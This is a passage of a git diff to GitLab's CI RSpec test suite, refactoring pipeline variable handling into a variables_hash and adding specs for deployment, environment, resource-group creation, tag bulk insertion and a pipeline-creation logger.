Gitlab::Ci::Build::Context::Build do it { is_expected.to include('CI_PROJECT_PATH' => pipeline.project.full_path) } end end + + describe '#variables' do + subject { context.variables.to_hash } + + it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + + it_behaves_like 'variables collection' + end + + describe '#variables_hash' do + subject { context.variables_hash } + + it { expect(context.variables_hash).to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } + + it_behaves_like 'variables collection' + end end diff --git a/spec/lib/gitlab/ci/build/context/global_spec.rb b/spec/lib/gitlab/ci/build/context/global_spec.rb index 61f2b90426d..d4141eb8389 100644 --- a/spec/lib/gitlab/ci/build/context/global_spec.rb +++ b/spec/lib/gitlab/ci/build/context/global_spec.rb @@ -8,11 +8,7 @@ RSpec.describe Gitlab::Ci::Build::Context::Global do let(:context) { described_class.new(pipeline, yaml_variables: yaml_variables) } - describe '#variables' do - subject { context.variables.to_hash } - - it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } - + shared_examples 'variables collection' do it { is_expected.to include('CI_COMMIT_REF_NAME' => 'master') } it { is_expected.to include('CI_PIPELINE_IID' => pipeline.iid.to_s) } it { is_expected.to include('CI_PROJECT_PATH' => pipeline.project.full_path) } @@ -26,4 +22,20 @@ RSpec.describe Gitlab::Ci::Build::Context::Global do it { is_expected.to include('SUPPORTED' => 'parsed') } end end + + describe '#variables' do + subject { context.variables.to_hash } + + it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + + it_behaves_like 'variables collection' + end + + describe '#variables_hash' do + subject { context.variables_hash } + + it { is_expected.to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } + + it_behaves_like 'variables collection' + end end diff --git a/spec/lib/gitlab/ci/build/policy/variables_spec.rb b/spec/lib/gitlab/ci/build/policy/variables_spec.rb index 6c8c968dc0c..436ad59bdf7 100644 --- a/spec/lib/gitlab/ci/build/policy/variables_spec.rb +++ b/spec/lib/gitlab/ci/build/policy/variables_spec.rb @@ -16,7 +16,7 @@ RSpec.describe Gitlab::Ci::Build::Policy::Variables do let(:seed) do double('build seed', to_resource: ci_build, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end @@ -91,7 +91,7 @@ RSpec.describe Gitlab::Ci::Build::Policy::Variables do let(:seed) do double('bridge seed', to_resource: bridge, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end diff --git a/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb b/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb index d20ea6c9202..532c83f6768 100644 --- a/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb +++ b/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb @@ -33,12 +33,12 @@ RSpec.describe Gitlab::Ci::Build::Rules::Rule::Clause::Changes do end context 'when context has the specified variables' do - let(:variables) do - [{ key: "HELM_DIR", value: "helm", public: true }] + let(:variables_hash) do + { 'HELM_DIR' => 'helm' } end before do - allow(context).to receive(:variables).and_return(variables) + allow(context).to receive(:variables_hash).and_return(variables_hash) end it { is_expected.to be_truthy } @@ -49,7 +49,7 @@ RSpec.describe Gitlab::Ci::Build::Rules::Rule::Clause::Changes do let(:modified_paths) { ['path/with/$in/it/file.txt'] } before do - allow(context).to receive(:variables).and_return([]) + allow(context).to receive(:variables_hash).and_return({}) end it { is_expected.to be_truthy } diff --git a/spec/lib/gitlab/ci/build/rules/rule_spec.rb b/spec/lib/gitlab/ci/build/rules/rule_spec.rb index 6f3c9278677..f905e229415 100644 --- a/spec/lib/gitlab/ci/build/rules/rule_spec.rb +++ b/spec/lib/gitlab/ci/build/rules/rule_spec.rb @@ -6,7 +6,7 @@ RSpec.describe Gitlab::Ci::Build::Rules::Rule do let(:seed) do double('build seed', to_resource: ci_build, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end diff --git a/spec/lib/gitlab/ci/build/rules_spec.rb b/spec/lib/gitlab/ci/build/rules_spec.rb index 1d5bdf30278..37bfdca4d1d 100644 --- a/spec/lib/gitlab/ci/build/rules_spec.rb +++ b/spec/lib/gitlab/ci/build/rules_spec.rb @@ -3,13 +3,13 @@ require 'spec_helper' RSpec.describe Gitlab::Ci::Build::Rules do - let(:pipeline) { create(:ci_pipeline) } - let(:ci_build) { build(:ci_build, pipeline: pipeline) } + let_it_be(:pipeline) { create(:ci_pipeline) } + let_it_be(:ci_build) { build(:ci_build, pipeline: pipeline) } let(:seed) do double('build seed', to_resource: ci_build, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end diff --git a/spec/lib/gitlab/ci/config/entry/bridge_spec.rb b/spec/lib/gitlab/ci/config/entry/bridge_spec.rb index 6c9c8fa5df5..62feed3dda0 100644 --- a/spec/lib/gitlab/ci/config/entry/bridge_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/bridge_spec.rb @@ -163,7 +163,7 @@ RSpec.describe Gitlab::Ci::Config::Entry::Bridge do }) end - it { is_expected.not_to be_valid } + it { is_expected.to be_valid } end context 'when bridge configuration uses rules with only' do diff --git a/spec/lib/gitlab/ci/config/entry/job_spec.rb b/spec/lib/gitlab/ci/config/entry/job_spec.rb index 0bb26babfc0..885f3eaff79 100644 --- a/spec/lib/gitlab/ci/config/entry/job_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/job_spec.rb @@ -118,6 +118,20 @@ RSpec.describe Gitlab::Ci::Config::Entry::Job do end end + context 'when config uses both "when:" and "rules:"' do + let(:config) do + { + script: 'echo', + when: 'on_failure', + rules: [{ if: '$VARIABLE', when: 'on_success' }] + } + end + + it 'is valid' do + expect(entry).to be_valid + end + end + context 'when delayed job' do context 'when start_in is specified' do let(:config) { { script: 'echo', when: 'delayed', start_in: '1 week' } } @@ -268,21 +282,6 @@ RSpec.describe Gitlab::Ci::Config::Entry::Job do end end - context 'when it uses both "when:" and "rules:"' do - let(:config) do - { - script: 'echo', - when: 'on_failure', - rules: [{ if: '$VARIABLE', when: 'on_success' }] - } - end - - it 'returns an error about when: being combined with rules' do - expect(entry).not_to be_valid - expect(entry.errors).to include 'job config key may not be used with `rules`: when' - end - end - context 'when delayed job' do context 'when start_in is specified' do let(:config) { { script: 'echo', when: 'delayed', start_in: '1 week' } } diff --git a/spec/lib/gitlab/ci/config/entry/processable_spec.rb b/spec/lib/gitlab/ci/config/entry/processable_spec.rb index c9c28e2eb8b..5b9337ede34 100644 --- a/spec/lib/gitlab/ci/config/entry/processable_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/processable_spec.rb @@ -33,6 +33,20 @@ RSpec.describe Gitlab::Ci::Config::Entry::Processable do end end + context 'when config uses both "when:" and "rules:"' do + let(:config) do + { + script: 'echo', + when: 'on_failure', + rules: [{ if: '$VARIABLE', when: 'on_success' }] + } + end + + it 'is valid' do + expect(entry).to be_valid + end + end + context 'when job name is more than 255' do let(:entry) { node_class.new(config, name: ('a' * 256).to_sym) } @@ -90,21 +104,6 @@ RSpec.describe Gitlab::Ci::Config::Entry::Processable do end end - context 'when it uses both "when:" and "rules:"' do - let(:config) do - { - script: 'echo', - when: 'on_failure', - rules: [{ if: '$VARIABLE', when: 'on_success' }] - } - end - - it 'returns an error about when: being combined with rules' do - expect(entry).not_to be_valid - expect(entry.errors).to include 'job config key may not be used with `rules`: when' - end - end - context 'when only: is used with rules:' do let(:config) { { only: ['merge_requests'], rules: [{ if: '$THIS' }] } } diff --git a/spec/lib/gitlab/ci/config/entry/tags_spec.rb b/spec/lib/gitlab/ci/config/entry/tags_spec.rb index 79317de373b..e05d4ae52b2 100644 --- a/spec/lib/gitlab/ci/config/entry/tags_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/tags_spec.rb @@ -36,25 +36,9 @@ RSpec.describe Gitlab::Ci::Config::Entry::Tags do context 'when tags limit is reached' do let(:config) { Array.new(50) {|i| "tag-#{i}" } } - context 'when ci_build_tags_limit is enabled' do - before do - stub_feature_flags(ci_build_tags_limit: true) - end - - it 'reports error' do - expect(entry.errors) - .to include "tags config must be less than the limit of #{described_class::TAGS_LIMIT} tags" - end - end - - context 'when ci_build_tags_limit is disabled' do - before do - stub_feature_flags(ci_build_tags_limit: false) - end - - it 'does not report an error' do - expect(entry.errors).to be_empty - end + it 'reports error' do + expect(entry.errors) + .to include "tags config must be less than the limit of #{described_class::TAGS_LIMIT} tags" end end end diff --git a/spec/lib/gitlab/ci/config/external/context_spec.rb b/spec/lib/gitlab/ci/config/external/context_spec.rb index 4b9adf7e87b..800c563cd0b 100644 --- a/spec/lib/gitlab/ci/config/external/context_spec.rb +++ b/spec/lib/gitlab/ci/config/external/context_spec.rb @@ -6,7 +6,8 @@ RSpec.describe Gitlab::Ci::Config::External::Context do let(:project) { double('Project') } let(:user) { double('User') } let(:sha) { '12345' } - let(:attributes) { { project: project, user: user, sha: sha } } + let(:variables) { Gitlab::Ci::Variables::Collection.new([{ 'key' => 'a', 'value' => 'b' }]) } + let(:attributes) { { project: project, user: user, sha: sha, variables: variables } } subject(:subject) { described_class.new(**attributes) } @@ -15,6 +16,9 @@ RSpec.describe Gitlab::Ci::Config::External::Context do it { is_expected.to have_attributes(**attributes) } it { expect(subject.expandset).to eq(Set.new) } it { expect(subject.execution_deadline).to eq(0) } + it { expect(subject.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + it { expect(subject.variables_hash).to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } + it { expect(subject.variables_hash).to include('a' => 'b') } end context 'without values' do @@ -23,6 +27,8 @@ RSpec.describe Gitlab::Ci::Config::External::Context do it { is_expected.to have_attributes(**attributes) } it { expect(subject.expandset).to eq(Set.new) } it { expect(subject.execution_deadline).to eq(0) } + it { expect(subject.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + it { expect(subject.variables_hash).to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } end end @@ -94,6 +100,15 @@ RSpec.describe Gitlab::Ci::Config::External::Context do end describe '#mutate' do + let(:attributes) do + { + project: project, + user: user, + sha: sha, + logger: double('logger') + } + end + shared_examples 'a mutated context' do let(:mutated) { subject.mutate(new_attributes) } @@ -107,6 +122,7 @@ RSpec.describe Gitlab::Ci::Config::External::Context do it { expect(mutated).to have_attributes(new_attributes) } it { expect(mutated.expandset).to eq(subject.expandset) } it { expect(mutated.execution_deadline).to eq(mutated.execution_deadline) } + it { expect(mutated.logger).to eq(mutated.logger) } end context 'with attributes' do diff --git a/spec/lib/gitlab/ci/config/external/processor_spec.rb b/spec/lib/gitlab/ci/config/external/processor_spec.rb index 2e9e6f95071..97bd74721f2 100644 --- a/spec/lib/gitlab/ci/config/external/processor_spec.rb +++ b/spec/lib/gitlab/ci/config/external/processor_spec.rb @@ -6,7 +6,7 @@ RSpec.describe Gitlab::Ci::Config::External::Processor do include StubRequests let_it_be(:project) { create(:project, :repository) } - let_it_be(:another_project) { create(:project, :repository) } + let_it_be_with_reload(:another_project) { create(:project, :repository) } let_it_be(:user) { create(:user) } let(:sha) { '12345' } @@ -251,6 +251,17 @@ RSpec.describe Gitlab::Ci::Config::External::Processor do it 'properly expands all includes' do is_expected.to include(:my_build, :remote_build, :rspec) end + + it 'propagates the pipeline logger' do + processor.perform + + process_obs_count = processor + .logger + .observations_hash + .dig('config_mapper_process_duration_s', 'count') + + expect(process_obs_count).to eq(3) + end end context 'when user is reporter of another project' do diff --git a/spec/lib/gitlab/ci/config/external/rules_spec.rb b/spec/lib/gitlab/ci/config/external/rules_spec.rb index 1e42cb30ae7..091bd3b07e6 100644 --- a/spec/lib/gitlab/ci/config/external/rules_spec.rb +++ b/spec/lib/gitlab/ci/config/external/rules_spec.rb @@ -8,7 +8,7 @@ RSpec.describe Gitlab::Ci::Config::External::Rules do subject(:rules) { described_class.new(rule_hashes) } describe '#evaluate' do - let(:context) { double(variables: {}) } + let(:context) { double(variables_hash: {}) } subject(:result) { rules.evaluate(context).pass? } @@ -20,13 +20,13 @@ RSpec.describe Gitlab::Ci::Config::External::Rules do let(:rule_hashes) { [{ if: '$MY_VAR == "hello"' }] } context 'when the rule matches' do - let(:context) { double(variables: { MY_VAR: 'hello' }) } + let(:context) { double(variables_hash: { 'MY_VAR' => 'hello' }) } it { is_expected.to eq(true) } end context 'when the rule does not match' do - let(:context) { double(variables: { MY_VAR: 'invalid' }) } + let(:context) { double(variables_hash: { 'MY_VAR' => 'invalid' }) } it { is_expected.to eq(false) } end diff --git a/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb b/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb index f487fccdab7..60b4e01f382 100644 --- a/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb +++ b/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb @@ -103,7 +103,7 @@ RSpec.describe Gitlab::Ci::Parsers::Terraform::Tfplan do 'create' => 0, 'update' => 1, 'delete' => 0, - 'job_name' => artifact.job.options.dig(:artifacts, :name).to_s + 'job_name' => artifact.job.name ) ) ) @@ -124,7 +124,7 @@ RSpec.describe Gitlab::Ci::Parsers::Terraform::Tfplan do 'create' => 0, 'update' => 1, 'delete' => 0, - 'job_name' => artifact.job.options.dig(:artifacts, :name).to_s + 'job_name' => artifact.job.name ) ) ) diff --git a/spec/lib/gitlab/ci/pipeline/chain/create_deployments_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/create_deployments_spec.rb new file mode 100644 index 00000000000..28bc685286f --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/chain/create_deployments_spec.rb @@ -0,0 +1,97 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Pipeline::Chain::CreateDeployments do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { create(:user) } + + let(:stage) { build(:ci_stage_entity, project: project, statuses: [job]) } + let(:pipeline) { create(:ci_pipeline, project: project, stages: [stage]) } + + let(:command) do + Gitlab::Ci::Pipeline::Chain::Command.new(project: project, current_user: user) + end + + let(:step) { described_class.new(pipeline, command) } + + describe '#perform!' do + subject { step.perform! } + + before do + job.pipeline = pipeline + end + + context 'when a pipeline contains a deployment job' do + let!(:job) { build(:ci_build, :start_review_app, project: project) } + let!(:environment) { create(:environment, project: project, name: job.expanded_environment_name) } + + it 'creates a deployment record' do + expect { subject }.to change { Deployment.count }.by(1) + + job.reset + expect(job.deployment.project).to eq(job.project) + expect(job.deployment.ref).to eq(job.ref) + expect(job.deployment.sha).to eq(job.sha) + expect(job.deployment.deployable).to eq(job) + expect(job.deployment.deployable_type).to eq('CommitStatus') + expect(job.deployment.environment).to eq(job.persisted_environment) + end + + context 'when creation failure occures' do + before do + allow_next_instance_of(Deployment) do |deployment| + allow(deployment).to receive(:save!) { raise ActiveRecord::RecordInvalid } + end + end + + it 'trackes the exception' do + expect { subject }.to raise_error(described_class::DeploymentCreationError) + + expect(Deployment.count).to eq(0) + end + end + + context 'when the corresponding environment does not exist' do + let!(:environment) { } + + it 'does not create a deployment record' do + expect { subject }.not_to change { Deployment.count } + + expect(job.deployment).to be_nil + end + end + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it 'does not create a deployment record' do + expect { subject }.not_to change { Deployment.count } + + expect(job.deployment).to be_nil + end + end + end + + context 'when a pipeline contains a teardown job' do + let!(:job) { build(:ci_build, :stop_review_app, project: project) } + let!(:environment) { create(:environment, name: job.expanded_environment_name) } + + it 'does not create a deployment record' do + expect { subject }.not_to change { Deployment.count } + + expect(job.deployment).to be_nil + end + end + + context 'when a pipeline does not contain a deployment job' do + let!(:job) { build(:ci_build, project: project) } + + it 'does not create any deployments' do + expect { subject }.not_to change { Deployment.count } + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb index d60ecc80a6e..4206483b228 100644 --- a/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/chain/create_spec.rb @@ -56,4 +56,74 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Create do .to include /Failed to persist the pipeline/ end end + + context 'tags persistence' do + let(:stage) do + build(:ci_stage_entity, pipeline: pipeline) + end + + let(:job) do + build(:ci_build, stage: stage, pipeline: pipeline, project: project) + end + + let(:bridge) do + build(:ci_bridge, stage: stage, pipeline: pipeline, project: project) + end + + before do + pipeline.stages = [stage] + stage.statuses = [job, bridge] + end + + context 'without tags' do + it 'extracts an empty tag list' do + expect(CommitStatus) + .to receive(:bulk_insert_tags!) + .with(stage.statuses, {}) + .and_call_original + + step.perform! + + expect(job.instance_variable_defined?(:@tag_list)).to be_falsey + expect(job).to be_persisted + expect(job.tag_list).to eq([]) + end + end + + context 'with tags' do + before do + job.tag_list = %w[tag1 tag2] + end + + it 'bulk inserts tags' do + expect(CommitStatus) + .to receive(:bulk_insert_tags!) + .with(stage.statuses, { job.name => %w[tag1 tag2] }) + .and_call_original + + step.perform! + + expect(job.instance_variable_defined?(:@tag_list)).to be_falsey + expect(job).to be_persisted + expect(job.tag_list).to match_array(%w[tag1 tag2]) + end + end + + context 'when the feature flag is disabled' do + before do + job.tag_list = %w[tag1 tag2] + stub_feature_flags(ci_bulk_insert_tags: false) + end + + it 'follows the old code path' do + expect(CommitStatus).not_to receive(:bulk_insert_tags!) + + step.perform! + + expect(job.instance_variable_defined?(:@tag_list)).to be_truthy + expect(job).to be_persisted + expect(job.reload.tag_list).to match_array(%w[tag1 tag2]) + end + end + end end diff --git a/spec/lib/gitlab/ci/pipeline/chain/ensure_environments_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/ensure_environments_spec.rb new file mode 100644 index 00000000000..253928e1a19 --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/chain/ensure_environments_spec.rb @@ -0,0 +1,94 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Pipeline::Chain::EnsureEnvironments do + let(:project) { create(:project) } + let(:user) { create(:user) } + let(:stage) { build(:ci_stage_entity, project: project, statuses: [job]) } + let(:pipeline) { build(:ci_pipeline, project: project, stages: [stage]) } + + let(:command) do + Gitlab::Ci::Pipeline::Chain::Command.new(project: project, current_user: user) + end + + let(:step) { described_class.new(pipeline, command) } + + describe '#perform!' do + subject { step.perform! } + + before do + job.pipeline = pipeline + end + + context 'when a pipeline contains a deployment job' do + let!(:job) { build(:ci_build, :start_review_app, project: project) } + + it 'ensures environment existence for the job' do + expect { subject }.to change { Environment.count }.by(1) + + expect(project.environments.find_by_name('review/master')).to be_present + expect(job.persisted_environment.name).to eq('review/master') + expect(job.metadata.expanded_environment_name).to eq('review/master') + end + + context 'when an environment has already been existed' do + before do + create(:environment, project: project, name: 'review/master') + end + + it 'ensures environment existence for the job' do + expect { subject }.not_to change { Environment.count } + + expect(project.environments.find_by_name('review/master')).to be_present + expect(job.persisted_environment.name).to eq('review/master') + expect(job.metadata.expanded_environment_name).to eq('review/master') + end + end + + context 'when an environment name contains an invalid character' do + let(:pipeline) { build(:ci_pipeline, ref: '!!!', project: project, stages: [stage]) } + + it 'sets the failure status' do + expect { subject }.not_to change { Environment.count } + + expect(job).to be_failed + expect(job).to be_environment_creation_failure + expect(job.persisted_environment).to be_nil + end + end + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it 'does not create any environments' do + expect { subject }.not_to change { Environment.count } + + expect(job.persisted_environment).to be_nil + end + end + end + + context 'when a pipeline contains a teardown job' do + let!(:job) { build(:ci_build, :stop_review_app, project: project) } + + it 'ensures environment existence for the job' do + expect { subject }.to change { Environment.count }.by(1) + + expect(project.environments.find_by_name('review/master')).to be_present + expect(job.persisted_environment.name).to eq('review/master') + expect(job.metadata.expanded_environment_name).to eq('review/master') + end + end + + context 'when a pipeline does not contain a deployment job' do + let!(:job) { build(:ci_build, project: project) } + + it 'does not create any environments' do + expect { subject }.not_to change { Environment.count } + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/chain/ensure_resource_groups_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/ensure_resource_groups_spec.rb new file mode 100644 index 00000000000..87df5a3e21b --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/chain/ensure_resource_groups_spec.rb @@ -0,0 +1,85 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Pipeline::Chain::EnsureResourceGroups do + let(:project) { create(:project) } + let(:user) { create(:user) } + let(:stage) { build(:ci_stage_entity, project: project, statuses: [job]) } + let(:pipeline) { build(:ci_pipeline, project: project, stages: [stage]) } + let!(:environment) { create(:environment, name: 'production', project: project) } + + let(:command) do + Gitlab::Ci::Pipeline::Chain::Command.new(project: project, current_user: user) + end + + let(:step) { described_class.new(pipeline, command) } + + describe '#perform!' do + subject { step.perform! } + + before do + job.pipeline = pipeline + end + + context 'when a pipeline contains a job that requires a resource group' do + let!(:job) do + build(:ci_build, project: project, environment: 'production', options: { resource_group_key: '$CI_ENVIRONMENT_NAME' }) + end + + it 'ensures the resource group existence' do + expect { subject }.to change { Ci::ResourceGroup.count }.by(1) + + expect(project.resource_groups.find_by_key('production')).to be_present + expect(job.resource_group.key).to eq('production') + expect(job.options[:resource_group_key]).to be_nil + end + + context 'when a resource group has already been existed' do + before do + create(:ci_resource_group, project: project, key: 'production') + end + + it 'ensures the resource group existence' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + + expect(project.resource_groups.find_by_key('production')).to be_present + expect(job.resource_group.key).to eq('production') + expect(job.options[:resource_group_key]).to be_nil + end + end + + context 'when a resource group key contains an invalid character' do + let!(:job) do + build(:ci_build, project: project, environment: '!!!', options: { resource_group_key: '$CI_ENVIRONMENT_NAME' }) + end + + it 'does not create any resource groups' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + + expect(job.resource_group).to be_nil + end + end + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it 'does not create any resource groups' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + + expect(job.resource_group).to be_nil + end + end + end + + context 'when a pipeline does not contain a job that requires a resource group' do + let!(:job) { build(:ci_build, project: project) } + + it 'does not create any resource groups' do + expect { subject }.not_to change { Ci::ResourceGroup.count } + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb index cf21c98dbd5..cebc4c02d11 100644 --- a/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/chain/validate/external_spec.rb @@ -24,6 +24,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Validate::External do second_stage_job_name: stage: second_stage services: + - - postgres before_script: - echo 'first hello' @@ -142,6 +143,23 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Validate::External do perform! end + + it 'returns expected payload' do + expect(::Gitlab::HTTP).to receive(:post) do |_url, params| + payload = Gitlab::Json.parse(params[:body]) + + builds = payload['builds'] + expect(builds.count).to eq(2) + expect(builds[0]['services']).to be_nil + expect(builds[0]['stage']).to eq('first_stage') + expect(builds[0]['image']).to eq('hello_world') + expect(builds[1]['services']).to eq(['postgres']) + expect(builds[1]['stage']).to eq('second_stage') + expect(builds[1]['image']).to be_nil + end + + perform! + end end context 'when EXTERNAL_VALIDATION_SERVICE_TOKEN is set' do diff --git a/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb b/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb index 115674edc48..3e10ca686ba 100644 --- a/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/expression/lexeme/variable_spec.rb @@ -17,30 +17,33 @@ RSpec.describe Gitlab::Ci::Pipeline::Expression::Lexeme::Variable do end describe '#evaluate' do - it 'returns variable value if it is defined' do - variable = described_class.new('VARIABLE') + let(:lexeme) { described_class.new('VARIABLE') } - expect(variable.evaluate(VARIABLE: 'my variable')) + it 'returns variable value if it is defined' do + expect(lexeme.evaluate(VARIABLE: 'my variable')) .to eq 'my variable' end it 'allows to use a string as a variable key too' do - variable = described_class.new('VARIABLE') - - expect(variable.evaluate('VARIABLE' => 'my variable')) + expect(lexeme.evaluate('VARIABLE' => 'my variable')) .to eq 'my variable' end it 'returns nil if it is not defined' do - variable = described_class.new('VARIABLE') - - expect(variable.evaluate(OTHER: 'variable')).to be_nil + expect(lexeme.evaluate('OTHER' => 'variable')).to be_nil + expect(lexeme.evaluate(OTHER: 'variable')).to be_nil end it 'returns an empty string if it is empty' do - variable = described_class.new('VARIABLE') + expect(lexeme.evaluate('VARIABLE' => '')).to eq '' + expect(lexeme.evaluate(VARIABLE: '')).to eq '' + end + + it 'does not call with_indifferent_access unnecessarily' do + variables_hash = { VARIABLE: 'my variable' }.with_indifferent_access - expect(variable.evaluate(VARIABLE: '')).to eq '' + expect(variables_hash).not_to receive(:with_indifferent_access) + expect(lexeme.evaluate(variables_hash)).to eq 'my variable' end end end diff --git a/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb b/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb index ec7eebdc056..84713e2a798 100644 --- a/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/expression/statement_spec.rb @@ -9,6 +9,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Expression::Statement do .append(key: 'PATH_VARIABLE', value: 'a/path/variable/value') .append(key: 'FULL_PATH_VARIABLE', value: '/a/full/path/variable/value') .append(key: 'EMPTY_VARIABLE', value: '') + .to_hash end subject do diff --git a/spec/lib/gitlab/ci/pipeline/logger_spec.rb b/spec/lib/gitlab/ci/pipeline/logger_spec.rb new file mode 100644 index 00000000000..0b44e35dec1 --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/logger_spec.rb @@ -0,0 +1,132 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Gitlab::Ci::Pipeline::Logger do + let_it_be(:project) { build_stubbed(:project) } + let_it_be(:pipeline) { build_stubbed(:ci_pipeline, project: project) } + + subject(:logger) { described_class.new(project: project) } + + describe '#log_when' do + it 'stores blocks for later evaluation' do + logger.log_when { |obs| true } + + expect(logger.send(:log_conditions).first).to be_a(Proc) + end + end + + describe '#instrument' do + it "returns the block's value" do + expect(logger.instrument(:expensive_operation) { 123 }).to eq(123) + end + + it 'records durations of instrumented operations' do + loggable_data = { + 'expensive_operation_duration_s' => { + 'count' => 1, + 'avg' => a_kind_of(Numeric), + 'max' => a_kind_of(Numeric), + 'min' => a_kind_of(Numeric) + } + } + + logger.instrument(:expensive_operation) { 123 } + expect(logger.observations_hash).to match(a_hash_including(loggable_data)) + end + + it 'raises an error when block is not provided' do + expect { logger.instrument(:expensive_operation) } + .to raise_error(ArgumentError, 'block not given') + end + end + + describe '#observe' do + it 'records durations of observed operations' do + loggable_data = { + 'pipeline_creation_duration_s' => { + 'avg' => 30, 'count' => 1, 'max' => 30, 'min' => 30 + } + } + + expect(logger.observe(:pipeline_creation_duration_s, 30)).to be_truthy + expect(logger.observations_hash).to match(a_hash_including(loggable_data)) + end + end + + describe '#commit' do + subject(:commit) { logger.commit(pipeline: pipeline, caller: 'source') } + + before do + stub_feature_flags(ci_pipeline_creation_logger: flag) + allow(logger).to receive(:current_monotonic_time) { Time.current.to_i } + + logger.instrument(:pipeline_save) { travel(60.seconds) } + logger.observe(:pipeline_creation_duration_s, 30) + logger.observe(:pipeline_creation_duration_s, 10) + end + + context 'when the feature flag is enabled' do + let(:flag) { true } + + let(:loggable_data) do + { + 'class' => described_class.name.to_s, + 'pipeline_id' => pipeline.id, + 'pipeline_persisted' => true, + 'project_id' => project.id, + 'pipeline_creation_service_duration_s' => a_kind_of(Numeric), + 'pipeline_creation_caller' => 'source', + 'pipeline_source' => pipeline.source, + 'pipeline_save_duration_s' => { + 'avg' => 60, 'count' => 1, 'max' => 60, 'min' => 60 + }, + 'pipeline_creation_duration_s' => { + 'avg' => 20, 'count' => 2, 'max' => 30, 'min' => 10 + } + } + end + + it 'logs to application.json' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(commit).to be_truthy + end + + context 'with log conditions' do + it 'does not log when the conditions are false' do + logger.log_when { |_obs| false } + + expect(Gitlab::AppJsonLogger).not_to receive(:info) + + expect(commit).to be_falsey + end + + it 'logs when a condition is true' do + logger.log_when { |_obs| true } + logger.log_when { |_obs| false } + + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(commit).to be_truthy + end + end + end + + context 'when the feature flag is disabled' do + let(:flag) { false } + + it 'does not log' do + expect(Gitlab::AppJsonLogger).not_to receive(:info) + + expect(commit).to be_falsey + end + end + end +end diff --git a/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb b/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb index e2b64e65938..68806fbf287 100644 --- a/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb +++ b/spec/lib/gitlab/ci/pipeline/seed/build_spec.rb @@ -9,7 +9,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do let(:pipeline) { build(:ci_empty_pipeline, project: project, sha: head_sha) } let(:root_variables) { [] } let(:seed_context) { double(pipeline: pipeline, root_variables: root_variables) } - let(:attributes) { { name: 'rspec', ref: 'master', scheduling_type: :stage } } + let(:attributes) { { name: 'rspec', 